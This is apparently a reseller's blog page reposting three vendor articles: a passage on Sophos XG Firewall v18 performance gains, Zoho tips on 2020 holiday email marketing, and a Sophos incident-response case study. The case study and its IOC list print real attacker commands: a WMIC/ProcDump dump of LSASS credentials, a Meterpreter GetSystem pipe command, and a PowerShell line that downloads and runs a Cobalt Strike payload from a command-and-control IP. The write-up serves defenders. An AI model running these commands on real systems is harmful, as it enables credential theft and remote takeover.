The impact of fast-pathing is up to a 5x improvement in firewall traffic throughput! Of course, with a blend of real-world traffic mixes, not all applications qualify for trusted traffic FastPath acceleration, but if a substantial portion of your traffic can be accelerated on the FastPath, you could increase your firewall’s security scanning capacity while allowing more trusted traffic. That’s a win-win.

Be sure to see how to make the most of the Network Flow FastPath on your network to learn how this works and how to set it up optimally.

TLS inspection speed

The new Xstream TLS inspection solution also brings a tremendous boost in decrypting and inspecting encrypted traffic flows, with up to a 2x improvement in performance. And when you combine the added performance with the very granular and easy to manage TLS inspection policies, you can be sure you’re only inspecting traffic that really needs it – and now do it faster than ever.

See how to make the most of Xstream TLS Inspection on your XG Firewall.

IMIX traffic performance

Internet Mix or IMIX is an often used reference in measuring typical real-world internet network traffic performance, making it a good metric to consider when looking at performance.

The new Xstream architecture in XG Firewall v18 brings a substantial boost in performance to this important metric. On our mid-range firewall models, the gains are over 100%, with the average across the XG Series line being a 57% improvement in performance.

This is all thanks to optimizations in the packet processing flow, DPI engine, and Network Flow FastPath. It’s an incredible real-world improvement in traffic processing performance.

Other common traffic performance measurements also benefit from the Xstream architecture in v18, including raw firewall performance, IPS, AV, application control, and malware protection.

Get the latest XG Firewall brochure to see the latest performance metrics and how your XG Series model stacks up.

SSL VPN capacity

Further optimizations to our SSL engine in XG Firewall v18 MR3 bring some dramatic improvements to remote access SSL VPN capacity, with up to 6x the number of connections possible on our higher-end appliances.

Increases are more modest at the entry-level, but on a typical mid-range device like the XG 310, the capacity has tripled! This is great news for everyone managing a remote workforce these days.

Check out the other great enhancements with remote-access VPN.

Upgrade today

If you haven’t already, upgrade to XG Firewall v18 today. It’s a free performance boost, and you get a ton of great new protection and networking features.

Be sure to take advantage of all the resources available, including the recent “Making the Most of XG Firewall v18” article series that covers all the great new capabilities in XG Firewall v18:

Net Universe offers all Sophos Devices and subscritpions also consultant services with worldwide Delivery Services.
Send us an email to [email protected] for more information or visit https://www.netuniversecorp.com/sophos.

Experts weigh in on holiday email marketing in 2020

As we all know, the holiday season of 2020 is going to be unlike any other because of our “new normal.” This is why you’ll need to consider learning, unlearning, and relearning new strategies for email marketing during this unprecedented time.

The Zoho Campaigns team recently conducted a Twitter chat and webinar with a couple of email marketing experts on this, and we’d love for you to take a glimpse at what we discussed. Some of these tips are applicable for any year, but many of them here are to help you adjust to the changing needs in 2020. Let’s get started!

Holiday email marketing
Experts weigh in on holiday email marketing in 2020

Excerpts from Twitter chat #ZCampaignsChat

We had tweeted out seven different questions related to holiday season email marketing, and here’s what our experts had to tell us.

Q1. Given our “new normal” related to COVID-19, what twists and turns do you expect to encounter during the upcoming holiday season?

Bottom Line: More than in any recent time, there will be a rise in online shopping. So be careful to send emails that are relevant to the right people. This can be achieved with the help of list segmentation. Hold off on typical marketing or promotional emails and instead focus on targeted offers and promotions.

 

Q2. What are some of the best practices/experiments email marketers can try in these uncertain times?

 Bottom Line: Build trust and relationships with your contacts and start sending personalized email campaigns. Make use of automation in order to have meaningful targeted conversations with your contacts. This helps make them realize that you value them.

 

Q3. When do you recommend sending the first holiday email and how often should emails be sent?

 Bottom Line: You will have to start warming up people by sending them email campaigns at least a week ahead and leaving sufficient time for them to prepare for the holidays. Strategic timing for your emails matter the most for engaging with them.

 

Q4.  What are some basic questions that need to be addressed before sending holiday emails?

 Bottom Line: Holidays differ based on regions, so you ought to know your contacts based on each region. Find particular holidays in each region and plan your email campaigns one step ahead by segmenting your lists based on demographics. Then make sure to personalize each email with offers and promotions that are region-specific and relevant.

 

Q5. How do you deal with inactive contacts during the holiday season?

Bottom Line: Start sending them reactivation campaigns like special offers, preference updating options, and more. This will help you find people who’re somewhat interested in your brand/services. Once you identify the opened contacts, you can continue to engage with them to bring them back on board.

 

Q6. Holiday emails are also about visual content. What are some trends and interesting usage of visuals you like?

Bottom Line: Apart from including photographs of your products, make sure to give importance to GIFs, illustrations, and more. Combining an attractive flow of content with a relevant message will increase the chances of engagement, thus improving customer relationships and sales. Try using pre-built email templates or get creative to ensure your content is a visual treat for your contacts.

 

Q7. What are some tried and tested abandoned cart recovery email strategies that will result in revenue?

Bottom Line: Always remember that most customers abandon their carts unknowingly. So, consider your abandoned cart email as a reminder to help pull your customers back. When would your contacts like to receive these emails? You’ll have to test this and find out. We suggest you send the email within 24 hours of the cart abandonment. Also, make sure to add some urgency to the emails to start recovering sales.

Those are some insights from our Twitter discussion, but that’s not all the tips and tricks we have for you today.

Excerpts from our webinar with Liz Willits

Let’s now look at what email marketing strategist Liz Willits had to say in our recent webinar, How to adjust your 2020 holiday email marketing game to changing needs.

Here are 12 tips Liz discussed:

Be sensitive

As marketers, being sensitive to your audience is always very important, but it’s especially important when your audience is going through a lot. There are a few ways to work this right: 

  • Choose your words carefully
    Keep an eye on current events so you don’t end up sending emails that arrive at an inappropriate time.

  • Don’t make light of serious situations
    It’s better not to make jokes about things like COVID-19—it’s really hard to strike the right note on a joke or while making light of something serious.

  • Consider giving an extra offer
    If your audiences are being affected economically by COVID-19 and you think your product would be helpful to them, go the extra mile and help them with what you can. These are the times you might want to send them love by giving extra sales or offers.

  • Be aware of the different holidays 
    Take into account all the holidays your audience celebrates to make sure you’re sending them relevant holiday campaigns. For example, don’t send a Thanksgiving promotion to the part of your audience that lives in India, where Thanksgiving isn’t celebrated.

 

Plan ahead

  • Many holidays like Black Friday, Hanukkah, and Christmas are going to come really soon, so have your content plan ready.

  • Start planning out your design elements now if you use heavily designed templates with different imagery. Start working with your design team well ahead since everyone will be busy with their personal lives on top of work. Get things ready by October or early November.

  • Don’t send your emails right on the holiday. For example, if it’s Black Friday, send your sale campaigns a week in advance. Do pre-holiday sale and post-holiday follow-up campaigns.


Don’t send too many emails

  • Avoid overwhelming your audience with too many emails—especially in 2020—because they have a lot going on in their lives already.

  • The best way you can do this is by providing an opt-out option for the sale campaign. This will let them opt out of that specific sale campaign and from your entire email list. Give them the right to choose what they want.

  • This is the time to be empathetic. Keep in mind the experience that they are having and try to show empathy in your tone rather than being salesy.


Use dynamic content to update your sales emails

Use dynamic content to update your holiday emails even after they’ve hit the inbox. For example, if you’ve sent a campaign on a flash sale and someone opens the campaign after the sale is over, they should read a banner that says, “Sorry, this sale is over, but you can still shop this week’s deals.” Dynamic content helps you stay relevant.

 

Write subject lines that stand out

Your audiences’ inboxes are flooded with emails during the holiday season, and your email will just remain unopened if you use ordinary subject lines. For example, do not just use “Merry Christmas” and talk about your newly launched product in your content. Use subject lines that are creative and that make you stand out, especially during the holiday season.

 

Make your copy easy to read

Don’t make your email content confusing, complicated, or heavy to read. Here are a couple of ways to create a readable and scannable copy:

  • Use short sentences and paragraphs, bullet points, and headlines to break up sections and paragraphs.

  • Use “you” instead of “we” or “I.” In other words, your angle should be about how your message benefits them. For example, don’t say “We just launched a new product.” Instead say, “You can get a 40% off on this new product.”

 

Keep your subscribers aware of important dates

It’s important to keep your subscribers informed of important dates like the last day of a sale or the last day to get a product shipped before Christmas. Highlight them in your subject lines with the time the sale ends.

 

Create gift guides

This is the best thing ecommerce businesses can do during the holiday season. Not just ecommerce—even B2Bs can do it. While ecommerce businesses can create gift guides for different gift categories such as Gifts for him, Gifts for her, and Gifts for friends, B2Bs can create gift guides like a guide for email marketers that includes their blog posts, tips, and tricks.

 

Clear is better than clever

Don’t try to be clever or cute in your content. People can’t waste their time on clever content. Rather, focus on what key idea needs to be delivered. This doesn’t mean your content needs to be to the point, but make sure you create curiosity in your audience’s mind to read your content.

 

Use alt text

Some people have turned off images in their inbox, or sometimes things can simply go wrong, so always place clear alternative text behind your image. That way recipients will still get your key messages and understand the context even if they can’t see the image.

 

Get festive

It’s fun season, so remember to excite your audience with your emails. Get festive! A great way to do this is through your email design. Go with a holiday game or holiday party theme, run giveaways, and find other ways to make your audience happy. Have fun with these little things in your emails during the holiday season.

 

Show off your product

This is very important for ecommerce businesses—it might seem straightforward, but it’s important to show your products to your audience. The best way to do this is by showing specific products that will excite your audience in the holiday email. This will get them to click the ones they’re interested in. This is a great way to take your recipients to your website and get them to purchase your products.

We hope these insights help you warm up your holiday email marketing strategy. Have fun creating content that resonates with your audience. Wishing you all a happy holiday season 🙂

– Team Zoho Campaigns

Net Universe offers all Zoho subscritpions and consultant services with worldwide Delivery Services.
Send us an email to [email protected] for more information or visit https://www.netuniversecorp.com/zoho.

An active adversary caught in the act – Sophos News

Customer profile: A professional sports organization based in the USA, with approximately 800 devices.

The Sophos Managed Threat Response (MTR) team provides 24/7 threat hunting, detection, and response capabilities delivered by an expert team as a fully-managed service.

The initial clue: A needle among the hay

In the hunt for suspicious events, the Sophos MTR team analyzes tens of millions of data points each day by leveraging threat intelligence, machine learning, and complex rule sets derived from the front-line experience that operators have gained from responding to threats day in, day out. This analysis is done with the goal of finding signals that could potentially be an indicator of an attack.

In this case, the signal was of a legitimate Microsoft’s Sysinternals tool. ProcDump.exe – a tool typically used by developers to analyze running software processes and to write (or ‘dump’) their memory to disk so that it can be inspected. Developers find this tool very handy for figuring out why a bug is occurring.

Yet in this instance, ProcDump was attempting to export the memory space of lsass.exe. This raised alarm bells with the Sophos MTR operations team which monitors the customer environment 24/7.

LSASS is the Local Security Authority Subsystem Service in Microsoft Windows and it is responsible for enforcing security policy and handling logins to Windows systems. If one were to write its memory to disk, the usernames and passwords of users could be retrieved from it.

The Sophos MTR team had indeed spotted an indicator of attack. Someone was trying to steal credentials.

You may have heard of Mimikatz, a tool whose sole purpose is for stealing passwords, hashes, security tokens, and so on. Adversaries sometimes avoid using this tool given its widespread detection by security products. But unlike Mimikatz, ProcDump has legitimate uses beyond just the nefarious, and thus is rarely detected by security vendors.

Someone was trying to not get caught.

The investigation begins

A case was created the same minute as the signal was generated, and a Sophos MTR operator immediately began to investigate.

Attempted credential theft

The operator looked into the historic data gathered by our agent and found the process that caused the detection. The process was trying to invoke a command:

C:Windowssystem32cmd.exe /C wmic /node:"SERVER NAME" process call create "C:PerfLogsprocdump.exe -accepteula -ma lsass C:PerfLogslsass.dmp"

The command shows the Windows command-line interpreter cmd.exe attempting to use WMIC – the interface for Windows Management Instrumentation. WMI is a tool for interacting with local and remote systems to get information and send them instructions.

Calling out to a remote server (redacted to SERVER NAME), the command was trying to tell the server to run ProcDump and write the LSASS process’ memory to disk.

Thankfully the MTR operator found no evidence that “lsass.dmp” was written to disk, and a review of their Sophos Central telemetry showed Sophos credential theft prevention technology successfully thwarted the adversary’s attempt.

But where did this command come from?

Attempted privilege escalation

The operator looked back up the process tree to find the parent of (i.e. what started) cmd.exe and found svchost.exe – the Windows Service Host that is used to run single processes and conserve computing resources.

The same instance of svchost also spawned another child process:

C:Windowssystem32cmd.exe /c echo 4d6b1c047b2 > \.pipe8eaee7

To the untrained eye, the above command doesn’t appear obviously malicious. Yet this is a common artifact that can be observed from the GetSystem function of Meterpreter.

The Meterpreter is a payload that gives an adversary interactive command-line access to a host and GetSystem is a script built into the Meterpreter that aids an adversary in gaining full system privileges by impersonating a named pipe – a technology to enable processes to communicate with one another.

Thankfully the named pipe they were trying to exploit didn’t exist on the system at that time.

Command and control

With the knowledge that the adversary was using the Meterpreter, this would indicate they must have some kind of network connection to remotely send their commands to the compromised host.

Digging into the network logs, the MTR operator could see a large number of outbound connections to Bulgarian IP address 217.12.202.89 using the network port 443.

Port 443 is typically used by HTTPS for securely connecting to websites, and adversaries commonly use this port to hide themselves among legitimate web traffic.

This discovery initiated a review of this Bulgarian-based IP. One of the ports it had open to the internet is port 50050. This port is an ephemeral port – one that cannot be registered with IANA and thus is not a common port used by well-known network services. However, the MTR operator had seen this port many times before.

Port 50050 is the default listening port for a Cobalt Strike listening server. Cobalt Strike is a “threat emulation” tool typically marketed to penetration testers to easily facilitate adversarial attacks and help organizations see their risk to breaches.

However, malicious threat actors have gotten their hands on this tool and use it orchestrate real attacks on innocent victims.

Notifying the customer

Only minutes after the initial detection was made, the MTR operator completed the initial investigation and had high confidence that this was malicious adversarial activity.

Sophos MTR offers three modes of response to customers that they can switch between at any time:

Notify –Sophos conducts threat identification and investigation, informing the customer of the findings and offering the customer recommendations for how to respond to the threat themselves.

Collaborate – Sophos conducts threat identification and investigation, and collaborates on the response to the threat, dividing responsibility between the customer and the Sophos MTR team.

Authorize – Sophos conducts threat identification, investigation, and response and takes proactive action, informing the customer about what was detected and the response actions that were taken.

In this instance, the MTR customer was in Notify mode. The operator reached out to the customer via phone to discuss the discovery and to provide recommendations for how to respond to the immediate findings before the investigation continued.

The MTR operator shared the discoveries and the user accounts leveraged by the adversary. These accounts needed their passwords reset immediately to disable the adversary’s access. In addition to the phone call, all the details were provided in an email to be referenced while the customer took action.

Continuing the hunt

With the customer working on resetting the compromised accounts’ passwords, the MTR operator continued to follow the adversary’s journey across the customer’s network. At this point, no evidence had been found as to how they got inside.

Note that throughout the rest of this case, regular communication between the MTR operator and the customer took place via email.

Lurking in the cloud

Deeper analysis of the network traffic on the compromised host showed HTTPS traffic between the host and another that resided in the customer’s virtual private cloud (VPC), where they have a number of servers that face the public internet.

Diving into the logs of the server in the VPC, the MTR operator quickly spotted further GetSystem attempts and named pipe impersonation. However, all evidence pointed towards the already identified compromised hosts.

Additionally, a PowerShell (a scripting language built into Windows for use with task automation) command execution was identified:

"C:WindowsSystem32WindowsPowerShellv1.0powershell.exe" -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://217.12.202.89:80/axdfcvgfdfgyhnhgvcdfvghjh'))"

This one-line command reaches out to a URL and downloads and executes a payload it finds there. The URL points to the same Bulgarian IP where the MTR team found the open ports for Cobalt Strike.

SophosLabs

The MTR operator quickly reached out to SophosLabs, Sophos’ threat analysis, intelligence, and research division. Sharing the above command, the MTR operator asked for assistance with analyzing the payload hosted at that URL. Within a few minutes, SophosLabs shared their insights back with Sophos MTR.

Unfortunately, the payload in question was no longer present: seemingly taken down by the adversary shortly after they used it. SophosLabs promptly added the IP and the URL to the cloud intelligence platform that underpins all Sophos products and services so that any further use of that command and control server will be detected and blocked across all Sophos customers.

Finding the initial access

Finally, the MTR operator identified where the attack began. Continuing the analysis of the VPC server’s network logs, Remote Desktop Protocol (RDP) communication to an unknown host was spotted within the VPC. This unknown host was not under management by Sophos MTR, nor could it be found in the customer’s Sophos Central account.

The operator reached out to the customer to ask what this unknown host was and why it wasn’t under management.

It seems they decommissioned it too late. The adversary had laterally moved from the original compromised host to another and executed the PowerShell command. This gave them remote access to a new host in the event they lost their access via RDP.

This turned out to be a smart move by the adversary, as this is exactly what happened.

RDP servers far too often face the public internet ,making them a prime target of adversaries looking to break into networks. Once inside, RDP is a noisy and visual method of having remote access. Moving cursors on the screen are somewhat of a giveaway.

The first thing an adversary will look to do is to move laterally, to another host, and install a reverse shell – a way to have that host call back to them and give them command line access. Using the command line is a far more stealthy method of remote access, allowing them to hide in the background even while a user is logged in and using the host.

As to what the adversary’s goals were, these are unknown. The MTR operators identified the attacker long before they were able to action on their objectives, catching them while they were still in the network propagation stages, laterally moving and attempting to escalate their privileges.

Following the investigation, the MTR operators continued to monitor the customer’s estate for this specific threat for seven more days, identifying no further malicious or suspicious activity.

The MTR team then concluded that the adversary had been successfully ejected from the network.

Case closed. On to the next.

Learn more

For more information on the Sophos MTR service, visit our website or speak with a Sophos representative.

If you prefer to conduct your own threat hunts, Sophos EDR gives you the tools you need for advanced threat hunting and IT security operations hygiene. Start a 30-day no obligation trial today.

IOAs / IOCs

ProcDump of LSASS C:Windowssystem32cmd.exe /C wmic /node:”SERVER NAME” process call create “C:PerfLogsprocdump.exe -accepteula -ma lsass C:PerfLogslsass.dmp”
Meterpreter GetSystem C:Windowssystem32cmd.exe /c echo 4d6b1c047b2 > \.pipe8eaee7
C2 IPv4 217.12.202.89
C2 payload URL http://217.12.202.89:80/axdfcvgfdfgyhnhgvcdfvghjh
C2 port (Cobalt Strike) 50050
PowerShell to download and invoke Cobalt Strike payload “C:WindowsSystem32WindowsPowerShellv1.0powershell.exe” -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://217.12.202.89:80/axdfcvgfdfgyhnhgvcdfvghjh’))”

Net Universe offers all Sophos Devices and subscritpions also consultant services with worldwide Delivery Services.
Send us an email to [email protected] for more information or visit https://www.netuniversecorp.com/sophos.